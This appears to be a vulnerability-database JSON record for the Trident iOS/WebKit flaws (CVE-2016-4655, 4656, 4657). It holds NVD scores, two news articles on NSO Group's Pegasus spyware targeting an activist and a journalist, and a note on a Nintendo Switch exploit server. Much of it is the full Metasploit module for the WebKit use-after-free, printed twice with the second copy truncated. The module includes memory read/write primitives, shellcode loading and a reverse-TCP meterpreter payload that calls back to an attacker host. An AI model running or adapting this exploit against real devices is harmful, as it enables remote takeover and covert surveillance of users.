["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4657"], "modified": "2018-06-08T01:29:00", "cpe": ["cpe:/o:apple:iphone_os:9.3.4"], "id": "CVE-2016-4657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4657", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:iphone_os:9.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:39", "description": "The kernel in Apple iOS before 9.3.5 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-08-25T21:59:00", "title": "CVE-2016-4656", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4656"], "modified": "2018-06-08T01:29:00", "cpe": ["cpe:/o:apple:iphone_os:9.3.4"], "id": "CVE-2016-4656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4656", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:iphone_os:9.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:39", "description": "The kernel in Apple iOS before 9.3.5 allows attackers to obtain sensitive information from memory via a crafted app.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-25T21:59:00", "title": "CVE-2016-4655", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4655"], "modified": "2018-06-08T01:29:00", "cpe": ["cpe:/o:apple:iphone_os:9.3.4", "cpe:/o:apple:iphone_os:10.0"], "id": "CVE-2016-4655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4655", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:iphone_os:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.0:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T12:01:24", "description": "Can be used for:\n\nCVE-2016-4657 Nintendo Switch Node Server\n\nQuick node.js server for the WebKit exploit. The virus can be modified in exploit.js\n\nInstalling and Running `cd <this repo> npm i sudo node server.js`\n\nServer runs on port 80 (needs root) unless specified otherwise. Route conntest.nintendowifi.net to your machine running this server using a proxy server of your choice (i.e. the Burp).\n\nModified Switch Exploit by LiveOverflow. Original CVE Quertyoruiopz & Pangu Team.\n", "published": "2017-03-13T00:00:00", "type": "seebug", "title": "WebKit memory corruption vulnerability(CVE-2016-4657 )", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4657"], "modified": "2017-03-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92772", "id": "SSV:92772", "sourceData": "\n PoC\u53ef\u53c2\u8003\u4ee5\u4e0b\u76f8\u5173\u94fe\u63a5\uff1a\r\nhttps://github.com/LiveOverflow/lo_nintendoswitch\r\nhttps://github.com/rxetxe/node_switchhax\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92772"}], "threatpost": [{"lastseen": "2018-10-06T22:54:52", "bulletinFamily": "info", "cvelist": ["CVE-2016-4655", "CVE-2016-4656", "CVE-2016-4657"], "description": "Apple rushed an [emergency iOS update](<https://support.apple.com/en-us/HT207107>) today after the discovery of three zero-day vulnerabilities used by governments to spy on the activities of human rights activists and journalists.\n\nThe zero days, called Trident, allow an attacker to take complete control of an iPhone or iPad with just one click. Trident\u2019s three separate zero-days create an attack chain that can compromise even Apple\u2019s latest model iOS devices.\n\nThe zero days were privately disclosed to Apple by Citizen Lab, which is based at the Munk School of Global Affairs at the University of Toronto, and by mobile security company Lookout. Users are urged to update iOS devices to version 9.3.5.\n\n\u201cThis is a serious vulnerability. It is designed to work silently and remotely so that all a user has to do is click a link and the exploits happen, and the device becomes jailbroken and the malware is installed,\u201d said Andrew Blaich a security researcher at Lookout. \u201cThe user has no indication that anything has gone wrong on their device.\u201d\n\nThe zero-days were sold by a controversial software company in Israel called the NSO Group, according to Citizen Lab. That company brands its surveillance mobile spyware as Pegasus, and sells it to governments and third parties who use it to spy on what they consider high-value targets, Citizen Lab said.\n\nCitizen Lab was notified of Pegasus on Aug. 10 by Ahmed Mansoor, a human rights activist from the United Arab Emirates, who contacted the organization about a strange text message sent to his iPhone from an unrecognized phone number.\n\nThe message contained a link to an unknown website and was accompanied by a message that urged him to click a link to learn \u201cnew secrets\u201d about detainees tortured in UAE jails. Instead of clicking the link, Mansoor forwarded the link to Citizen Lab. Bill Marczak and John Scott-Railton, senior researchers at Citizen Lab, recognized the link as connected to a network of domains that were believed to be part of an exploit infrastructure provided by the NSO Group.\n\n\u201cWe immediately recognized this domain as part of a network of previous attacks we had looked at,\u201d said Scott-Railton. \u201cHoping the network was still live and ready to serve and exploit, we visited it on an iPhone and we were able to get a successful infection.\u201d\n\nCitizen Lab was not able to determine the extent of past or present infections with Pegasus. However, it was able to determine that Mansoor was not the only one infected; Mexican journalist Rafael Cabrera had also been targeted. Citizen Lab [published a report on Thursday](<https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/>) outlining its discovery.\n\n\u201cThis shows that some governments are willing to spend huge amounts of money to get into the minds and private communications of people who are in this sort of position,\u201d said Scott-Railton in an interview with Threatpost. \u201cThis research shows the power of independent organizations like Citizen Lab doing work with dissidents and other groups that don\u2019t have the resources and money to pay for enterprise-grade security. Just because they can\u2019t defend themselves against it, doesn\u2019t mean they won\u2019t be targets of sophisticated malware. Going forward we expect so see more attacks of this type,\u201d he said.\n\nLookout said Pegasus is the most sophisticated attack it has seen on any endpoint. According to a Lookout report:\n\n> \u201cPegasus is professionally developed and highly advanced in its use of zero-day vulnerabilities, code obfuscation, and encryption. It uses sophisticated function hooking to subvert OS- and application-layer security in voice/audio calls and apps including Gmail, Facebook, WhatsApp, Facetime, Viber, WeChat, Telegram, Apple\u2019s built-in messaging and email apps, and others. It steals the victim\u2019s contact list and GPS location, as well as personal, Wi-Fi, and router passwords stored on the device.\u201d\n\nAccording to a [technical analysis of the malware](<https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf>) by Lookout, the first zero day (CVE-2016-4655), was a memory corruption vulnerability in Apple\u2019s mobile web browser WebKit.\n\n[![Courtesy of Lookout](https://media.threatpost.com/wp-content/uploads/sites/103/2016/08/06233922/Apple_Trinity_0day-1024x467.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/08/06233922/Apple_Trinity_0day.jpg>)\n\nImage: Courtesy Lookout\n\nThe second (CVE-2016-4656) is a kernel base mapping vulnerability that leaks information to the attacker that allows him to calculate the kernel memory, according to Lookout. The third (CVE-2016-4657) is a kernel memory corruption that leads to the jailbreaking of the device. Lookout said these are 32- and 64-bit iOS kernel-level vulnerabilities that allow the attacker to silently jailbreak the device and, in this case, install surveillance software.\n\n\u201cThe attack sequence begins with a simple phishing scheme: send a text (or Twitter or other type of) message with a benign-looking URL, user clicks on link, open web browser, load page, exploit a browser or operating system vulnerability, install software to gather information and to ensure that the software stays installed on the device (persistence),\u201d wrote Lookout.\n\nThe Pegasus spyware can spy on phone calls, call logs, SMS messages and can turn on the phone\u2019s microphone, speaker and camera. \u201cAccess to this content could be used to gain further access into other accounts owned by the target, such as banking, email, and other services he/she may use on or off the device,\u201d Lookout wrote.\n\nLookout\u2019s Blaich said he believes variants of Trident have been in use for years going back to iOS 7 released in 2013.\n\n\u201cNSO Group reportedly has hundreds of employees and makes millions of dollars in annual revenue, effectively as a cyber arms dealer, from the sale of its sophisticated mobile attack software. NSO is only one example of this type of cyber mercenary: we know that it is not the only one,\u201d wrote Lookout.\n", "modified": "2016-08-29T17:57:03", "published": "2016-08-25T17:33:16", "id": "THREATPOST:60101DF624A979A9924003068B7994CC", "href": "https://threatpost.com/emergency-ios-update-patches-zero-days-used-by-government-spyware/120158/", "type": "threatpost", "title": "Emergency iOS Update Patches Zero Days Used by Government Spyware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:49", "bulletinFamily": "info", "cvelist": ["CVE-2016-4655", "CVE-2016-4657", "CVE-2106-4656"], "description": "The disclosure a week ago that [three Apple iOS zero days](<https://threatpost.com/emergency-ios-update-patches-zero-days-used-by-government-spyware/120158/>) were used to spy on a political dissident from the United Arab Emirates included high-profile exposes of the activities of a cyber arms-dealing outfit in Israel known as the NSO Group and an [emergency update for iOS](<https://support.apple.com/en-us/HT207107>).\n\nLast night, Apple expanded the scope of the situation with patches for the same trio of vulnerabilities in [OS X](<https://support.apple.com/en-us/HT207130>) and [Safari](<https://support.apple.com/en-us/HT207131>).\n\nApple did not respond in time for publication to a request as to why it took them a week to address the same bugs in its desktop OS and flagship browser.\n\nThe vulnerabilities, known as Trident, can be used to compromise iOS or OS X devices and execute arbitrary code. The zero days were privately disclosed to Apple by Citizen Lab, which is based at the Munk School of Global Affairs at the University of Toronto, and by mobile security company Lookout. Citizen Lab and Lookout published some [technical details](<https://blog.lookout.com/blog/2016/08/25/trident-pegasus/>) on how the vulnerabilities were used in iOS to [spy on Ahmed Mansoor](<https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/>), an acclaimed activist in the UAE.\n\nMansoor, in early August, received suspicious and targeted text messages that included a link. Mansoor passed the message on to contacts at Citizen Lab who analyzed the potential attack and connected it to NSO Group.\n\nNSO Group\u2019s wares are not the first to be used against Mansoor; in 2011, FinFisher spyware and in 2012, Hacking Team spyware were used against the human rights defender, Citizen Lab and Lookout said.\n\nApple yesterday patched two kernel vulnerabilities in OS X (Yosemite 10.10.5 and El Capitan 10.11.6); CVE-2016-4655 discloses kernel memory, while CVE-2106-4656 is a memory corruption bug that exposes OS X to arbitrary code execution with kernel privileges.\n\nOne vulnerability, CVE-2016-4657, was patched in Safari 9.1.3. The bug is in the WebKit implementation in the browser where an attacker could lure the victim to a site hosting an exploit and be able to execute arbitrary code on the machine.\n\nIn iOS, the WebKit vulnerability was particularly dangerous since its allows for complete compromise with just a click of a link, for example. Lookout said the kernel information leak vulnerability allows an attacker to learn kernel location in memory, while the second kernel bug allows for a silent jailbreak of the device and the installation, in Mansoor\u2019s case, of surveillance software called Pegasus.\n\nNSO Group is alleged to have sold Pegasus to governments in order to spy on high-value targets.\n\nCitizen Lab said Mansoor was not the only one infected with Pegasus spyware; Mexican journalist Rafael Cabrera had also been targeted.\n\n\u201cThis shows that some governments are willing to spend huge amounts of money to get into the minds and private communications of people who are in this sort of position,\u201d said Citizen Lab researcher John Scott-Railton in an interview with Threatpost. \u201cThis research shows the power of independent organizations like Citizen Lab doing work with dissidents and other groups that don\u2019t have the resources and money to pay for enterprise-grade security. Just because they can\u2019t defend themselves against it, doesn\u2019t mean they won\u2019t be targets of sophisticated malware. Going forward we expect so see more attacks of this type,\u201d he said.\n\niOS zero days have tremendous value in vulnerability markets. Exploit vendor Zerodium last September put up a month-long [million-dollar bounty](<https://threatpost.com/zerodium-hosts-million-dollar-ios-9-bug-bounty/114736/>) looking for iOS 9 zero-day vulnerabilities. The company, started by VUPEN founder Chaouki Bekrar, buys zero days for all major mobile and desktop platforms and for third-party software and said the attacks it purchases are built into a feed of vulnerabilities, exploits and defensive capabilities for its customers. Bekrar denied in a tweet that the Apple zero days came from his company.\n\n> The iOS zero-days allegedly linked to NSO are Not ours and are Not related to [@Zerodium](<https://twitter.com/Zerodium>), but thank you for asking. [#0days](<https://twitter.com/hashtag/0days?src=hash>) [#WildWildWest](<https://twitter.com/hashtag/WildWildWest?src=hash>)\n> \n> \u2014 Chaouki Bekrar (@cBekrar) [August 26, 2016](<https://twitter.com/cBekrar/status/769159940942409729>)\n\nPegasus spyware, meanwhile, can be leveraged to spy on phone calls, SMS messages and media on the device such as the microphone or camera. Lookout researcher Andrew Blaich said that the zero days, or variants thereof, could have been used since 2013 dating back to iOS 7.\n", "modified": "2016-09-02T13:16:02", "published": "2016-09-02T10:00:29", "id": "THREATPOST:181538B86D17715A38771F0A83B343E9", "href": "https://threatpost.com/apple-patches-trident-vulnerabilities-in-os-x-safari/120336/", "type": "threatpost", "title": "Apple Patches Trident Vulnerabilities in OS X, Safari", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2018-06-05T01:34:31", "description": "", "published": "2018-06-04T00:00:00", "type": "packetstorm", "title": "WebKit not_number defineProperties Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4656", "CVE-2016-4655", "CVE-2016-4657"], "modified": "2018-06-04T00:00:00", "id": "PACKETSTORM:148041", "href": "https://packetstormsecurity.com/files/148041/WebKit-not_number-defineProperties-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'WebKit not_number defineProperties UAF', \n'Description' => %q{ \nThis module exploits a UAF vulnerability in WebKit's JavaScriptCore library. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'qwertyoruiop', # jbme.qwertyoruiop.com \n'siguza', # PhoenixNonce \n'tihmstar', # PhoenixNonce \n'timwr', # metasploit integration \n], \n'References' => [ \n['CVE', '2016-4655'], \n['CVE', '2016-4656'], \n['CVE', '2016-4657'], \n['BID', '92651'], \n['BID', '92652'], \n['BID', '92653'], \n['URL', 'https://blog.lookout.com/trident-pegasus'], \n['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'], \n['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'], \n['URL', 'https://github.com/Siguza/PhoenixNonce'], \n['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'], \n['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'], \n], \n'Arch' => ARCH_AARCH64, \n'Platform' => 'apple_ios', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' }, \n'Targets' => [[ 'Automatic', {} ]], \n'DisclosureDate' => 'Aug 25 2016')) \nregister_options( \n[ \nOptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8080 ]), \nOptString.new('URIPATH', [ true, \"The URI to use for this exploit.\", \"/\" ]) \n]) \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Request from #{request['User-Agent']}\") \nif request.uri =~ %r{/loader$} \nprint_good(\"Target is vulnerable.\") \nlocal_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"loader\" ) \nloader_data = File.read(local_file, {:mode => 'rb'}) \nsend_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) \nreturn \nelsif request.uri =~ %r{/exploit$} \nlocal_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"exploit\" ) \nloader_data = File.read(local_file, {:mode => 'rb'}) \npayload_url = \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\" \npayload_url_index = loader_data.index('PAYLOAD_URL') \nloader_data[payload_url_index, payload_url.length] = payload_url \nsend_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) \nprint_status(\"Sent exploit (#{loader_data.size} bytes)\") \nreturn \nend \nhtml = %Q^ \n<html> \n<body> \n<script> \nfunction load_binary_resource(url) { \nvar req = new XMLHttpRequest(); \nreq.open('GET', url, false); \nreq.overrideMimeType('text/plain; charset=x-user-defined'); \nreq.send(null); \nreturn req.responseText; \n} \nvar mem0 = 0; \nvar mem1 = 0; \nvar mem2 = 0; \n \nfunction read4(addr) { \nmem0[4] = addr; \nvar ret = mem2[0]; \nmem0[4] = mem1; \nreturn ret; \n} \n \nfunction write4(addr, val) { \nmem0[4] = addr; \nmem2[0] = val; \nmem0[4] = mem1; \n} \nfilestream = load_binary_resource(\"exploit\") \nvar shll = new Uint32Array(filestream.length / 4); \nfor (var i = 0; i < filestream.length;) { \nvar word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24); \nshll[i / 4] = word; \ni += 4; \n} \n_dview = null; \nfunction u2d(low, hi) { \nif (!_dview) _dview = new DataView(new ArrayBuffer(16)); \n_dview.setUint32(0, hi); \n_dview.setUint32(4, low); \nreturn _dview.getFloat64(0); \n} \nvar pressure = new Array(100); \nvar bufs = new Array(10000); \ndgc = function() { \nfor (var i = 0; i < pressure.length; i++) { \npressure[i] = new Uint32Array(0x10000); \n} \nfor (var i = 0; i < pressure.length; i++) { \npressure[i] = 0; \n} \n} \n \nfunction swag() { \nif (bufs[0]) return; \nfor (var i = 0; i < 4; i++) { \ndgc(); \n} \nfor (i = 0; i < bufs.length; i++) { \nbufs[i] = new Uint32Array(0x100 * 2) \nfor (k = 0; k < bufs[i].length;) { \nbufs[i][k++] = 0x41414141; \nbufs[i][k++] = 0xffff0000; \n} \n} \n} \nvar trycatch = \"\"; \nfor (var z = 0; z < 0x2000; z++) trycatch += \"try{} catch(e){}; \"; \nvar fc = new Function(trycatch); \nvar fcp = 0; \nvar smsh = new Uint32Array(0x10) \n \nfunction smashed(stl) { \ndocument.body.innerHTML = \"\"; \nvar jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]); \nwrite4(jitf, 0xd28024d0); //movz x16, 0x126 \nwrite4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4 \nwrite4(jitf + 8, 0xd4001001); //svc 80 \nwrite4(jitf + 12, 0xd65f03c0); //ret \nwrite4(jitf + 16, jitf + 0x20); \nwrite4(jitf + 20, 1); \nfc(); \nvar dyncache = read4(jitf + 0x20); \nvar dyncachev = read4(jitf + 0x20); \nvar go = 1; \nwhile (go) { \nif (read4(dyncache) == 0xfeedfacf) { \nfor (i = 0; i < 0x1000 / 4; i++) { \nif (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever \n{ \ngo = 0; \nbreak; \n} \n} \n} \ndyncache += 0x1000; \n} \ndyncache -= 0x1000; \nvar bss = []; \nvar bss_size = []; \nfor (i = 0; i < 0x1000 / 4; i++) { \nif (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) { \nbss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000); \nbss_size.push(read4(dyncache + i * 4 + (0x28))); \n} \n} \nvar shc = jitf; \nvar filestream = load_binary_resource(\"loader\") \nfor (var i = 0; i < filestream.length;) { \nvar word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24); \nwrite4(shc, word); \nshc += 4; \ni += 4; \n} \njitf &= ~0x3FFF; \njitf += 0x8000; \nwrite4(shc, jitf); \nwrite4(shc + 4, 1); \n// copy macho \nfor (var i = 0; i < shll.length; i++) { \nwrite4(jitf + i * 4, shll[i]); \n} \nfor (var i = 0; i < bss.length; i++) { \nfor (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) { \nwrite4(bss[i] + k * 4, 0); \n} \n} \nfc(); \n} \n \nfunction go_() { \nif (smsh.length != 0x10) { \nsmashed(); \nreturn; \n} \ndgc(); \nvar arr = new Array(0x100); \nvar yolo = new ArrayBuffer(0x1000); \narr[0] = yolo; \narr[1] = 0x13371337; \nvar not_number = {}; \nnot_number.toString = function() { \narr = null; \nprops[\"stale\"][\"value\"] = null; \nswag(); \nreturn 10; \n}; \nvar props = { \np0: { \nvalue: 0 \n}, \np1: { \nvalue: 1 \n}, \np2: { \nvalue: 2 \n}, \np3: { \nvalue: 3 \n}, \np4: { \nvalue: 4 \n}, \np5: { \nvalue: 5 \n}, \np6: { \nvalue: 6 \n}, \np7: { \nvalue: 7 \n}, \np8: { \nvalue: 8 \n}, \nlength: { \nvalue: not_number \n}, \nstale: { \nvalue: arr \n}, \nafter: { \nvalue: 666 \n} \n}; \nvar target = []; \nvar stale = 0; \nObject.defineProperties(target, props); \nstale = target.stale; \nstale[0] += 0x101; \nstale[1] = {} \nfor (var z = 0; z < 0x1000; z++) fc(); \nfor (i = 0; i < bufs.length; i++) { \nfor (k = 0; k < bufs[0].length; k++) { \nif (bufs[i][k] == 0x41414242) { \nstale[0] = fc; \nfcp = bufs[i][k]; \nstale[0] = { \n'a': u2d(105, 0), \n'b': u2d(0, 0), \n'c': smsh, \n'd': u2d(0x100, 0) \n} \nstale[1] = stale[0] \nbufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh \nbck = stale[0][4]; \nstale[0][4] = 0; // address, low 32 bits \n// stale[0][5] = 1; // address, high 32 bits == 0x100000000 \nstale[0][6] = 0xffffffff; \nmem0 = stale[0]; \nmem1 = bck; \nmem2 = smsh; \nbufs.push(stale) \nif (smsh.length != 0x10) { \nsmashed(stale[0]); \n} \nreturn; \n} \n} \n} \nsetTimeout(function() { \ndocument.location.reload(); \n}, 2000); \n} \n \ndgc(); \nsetTimeout(go_, 200); \n</script> \n</body> \n</html> \n^ \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148041/webkit_trident.rb.txt"}], "zdt": [{"lastseen": "2018-06-05T01:09:17", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2018-06-04T00:00:00", "title": "WebKit not_number defineProperties Use-After-Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4656", "CVE-2016-4655", "CVE-2016-4657"], "modified": "2018-06-04T00:00:00", "id": "1337DAY-ID-30530", "href": "https://0day.today/exploit/description/30530", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'WebKit not_number defineProperties UAF',\r\n 'Description' => %q{\r\n This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'qwertyoruiop', # jbme.qwertyoruiop.com\r\n 'siguza', # PhoenixNonce\r\n 'tihmstar', # PhoenixNonce\r\n 'timwr', # metasploit integration\r\n ],\r\n 'References' => [\r\n ['CVE', '2016-4655'],\r\n ['CVE', '2016-4656'],\r\n ['CVE', '2016-4657'],\r\n ['BID', '92651'],\r\n ['BID', '92652'],\r\n ['BID', '92653'],\r\n ['URL', 'https://blog.lookout.com/trident-pegasus'],\r\n ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],\r\n ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],\r\n ['URL', 'https://github.com/Siguza/PhoenixNonce'],\r\n ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],\r\n ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],\r\n ],\r\n 'Arch' => ARCH_AARCH64,\r\n 'Platform' => 'apple_ios',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\r\n 'Targets' => [[ 'Automatic', {} ]],\r\n 'DisclosureDate' => 'Aug 25 2016'))\r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8080 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use for this exploit.\", \"/\" ])\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Request from #{request['User-Agent']}\")\r\n if request.uri =~ %r{/loader$}\r\n print_good(\"Target is vulnerable.\")\r\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"loader\" )\r\n loader_data = File.read(local_file, {:mode => 'rb'})\r\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\r\n return\r\n elsif request.uri =~ %r{/exploit$}\r\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"exploit\" )\r\n loader_data = File.read(local_file, {:mode => 'rb'})\r\n payload_url = \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\r\n payload_url_index = loader_data.index('PAYLOAD_URL')\r\n loader_data[payload_url_index, payload_url.length] = payload_url\r\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\r\n print_status(\"Sent exploit (#{loader_data.size} bytes)\")\r\n return\r\n end\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n function load_binary_resource(url) {\r\n var req = new XMLHttpRequest();\r\n req.open('GET', url, false);\r\n req.overrideMimeType('text/plain; charset=x-user-defined');\r\n req.send(null);\r\n return req.responseText;\r\n }\r\n var mem0 = 0;\r\n var mem1 = 0;\r\n var mem2 = 0;\r\n\r\n function read4(addr) {\r\n mem0[4] = addr;\r\n var ret = mem2[0];\r\n mem0[4] = mem1;\r\n return ret;\r\n }\r\n\r\n function write4(addr, val) {\r\n mem0[4] = addr;\r\n mem2[0] = val;\r\n mem0[4] = mem1;\r\n }\r\n filestream = load_binary_resource(\"exploit\")\r\n var shll = new Uint32Array(filestream.length / 4);\r\n for (var i = 0; i < filestream.length;) {\r\n var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);\r\n shll[i / 4] = word;\r\n i += 4;\r\n }\r\n _dview = null;\r\n function u2d(low, hi) {\r\n if (!_dview) _dview = new DataView(new ArrayBuffer(16));\r\n _dview.setUint32(0, hi);\r\n _dview.setUint32(4, low);\r\n return _dview.getFloat64(0);\r\n }\r\n var pressure = new Array(100);\r\n var bufs = new Array(10000);\r\n dgc = function() {\r\n for (var i = 0; i 